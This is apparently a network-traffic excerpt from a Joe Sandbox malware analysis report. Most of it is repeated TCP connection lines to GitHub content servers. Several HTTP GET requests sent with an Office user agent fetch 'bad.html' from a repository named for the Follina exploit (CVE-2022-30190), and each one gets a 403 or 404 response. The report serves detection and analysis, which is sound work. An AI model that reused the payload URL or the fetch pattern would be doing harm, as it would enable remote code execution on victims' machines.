      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49714
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49715
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficDNS query: name: raw.githubusercontent.com
      Source: global trafficDNS query: name: raw.githubusercontent.com
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49704 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49705 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49706 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49708 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49709 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49710 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49711 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49713 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49707 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49712 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49715 -> 185.199.109.133:443
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:05 GMTVia: 1.1 varnishX-Served-By: cache-mxp6929-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787826.582963,VS0,VE9Access-Control-Allow-Origin: *X-Fastly-Request-ID: 3ff7e4b791bcf59d1adae5143531aa79a139b0deExpires: Thu, 18 Aug 2022 02:02:05 GMTVary: Authorization,Accept-Encodingtransfer-encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:05 GMTVia: 1.1 varnishX-Served-By: cache-mxp6939-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787826.732014,VS0,VE121Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: b9594ed1c6d167616f9ea3a4eaa3aa878f0b48f7Expires: Thu, 18 Aug 2022 02:02:05 GMTSource-Age: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:08 GMTVia: 1.1 varnishX-Served-By: cache-mxp6942-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787829.961872,VS0,VE9Access-Control-Allow-Origin: *X-Fastly-Request-ID: 1e438572101bdeafcc9fe390762dd85dc0c41b96Expires: Thu, 18 Aug 2022 02:02:08 GMTVary: Authorization,Accept-Encodingtransfer-encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:09 GMTVia: 1.1 varnishX-Served-By: cache-mxp6955-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787830.535497,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 4aa7bf1bd86ec554d4344a3b644d235210eff816Expires: Thu, 18 Aug 2022 02:02:09 GMTSource-Age: 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:09 GMTVia: 1.1 varnishX-Served-By: cache-mxp6925-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787830.792096,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 8f764b5df9319996b8b6c3a33902dda0dd52d219Expires: Thu, 18 Aug 2022 02:02:09 GMTSource-Age: 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:09 GMTVia: 1.1 varnishX-Served-By: cache-mxp6950-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787830.911926,VS0,VE9Access-Control-Allow-Origin: *X-Fastly-Request-ID: 90f3b6f9be95938ba8c5b82af688f9434fb26d83Expires: Thu, 18 Aug 2022 02:02:09 GMTVary: Authorization,Accept-Encodingtransfer-encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:10 GMTVia: 1.1 varnishX-Served-By: cache-mxp6956-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787830.028214,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: c51a7588355283b280daf7ac0379487c3b85e255Expires: Thu, 18 Aug 2022 02:02:10 GMTSource-Age: 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:10 GMTVia: 1.1 varnishX-Served-By: cache-mxp6925-MXPX-Cache: HITX-Cache-Hits: 2X-Timer: S1660787830.367433,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: f1cb60f7c941317068e3e73d7fbbe8ce8a5f2458Expires: Thu, 18 Aug 2022 02:02:10 GMTSource-Age: 5
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:10 GMTVia: 1.1 varnishX-Served-By: cache-mxp6941-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787831.680249,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 9cc769d5c6e06fa7a2b3dd1d9f39dd18e6512588Expires: Thu, 18 Aug 2022 02:02:10 GMTSource-Age: 5
